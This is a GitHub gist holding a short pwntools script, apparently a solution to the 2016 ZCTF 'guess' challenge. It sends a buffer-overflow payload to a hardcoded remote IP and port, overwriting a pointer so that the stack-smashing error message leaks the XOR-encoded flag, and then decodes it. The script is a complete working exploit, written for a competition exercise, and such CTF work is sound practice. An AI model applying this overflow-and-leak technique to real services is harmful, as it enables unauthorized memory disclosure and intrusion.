Skip to content

Instantly share code, notes, and snippets.

@cubarco

cubarco/zctf-guess.py

Created January 24, 2016 12:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cubarco/cbbd4ab5462c2f0f287b to your computer and use it in GitHub Desktop.
Save cubarco/cbbd4ab5462c2f0f287b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
zctf-guess.py
#!/usr/bin/env python
# coding=utf8
from pwn import p64, remote
p = remote('115.28.27.103', 22222)
flag_addr = 0x6010c0
p.sendline('ZCTF{' + '\x01'*29 + '\x00'*262 + p64(flag_addr+5))
p.recvuntil('***: ')
xored_flag = p.recv(29)
print 'ZCTF{' + ''.join([chr(ord(i) ^ 1) for i in xored_flag])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment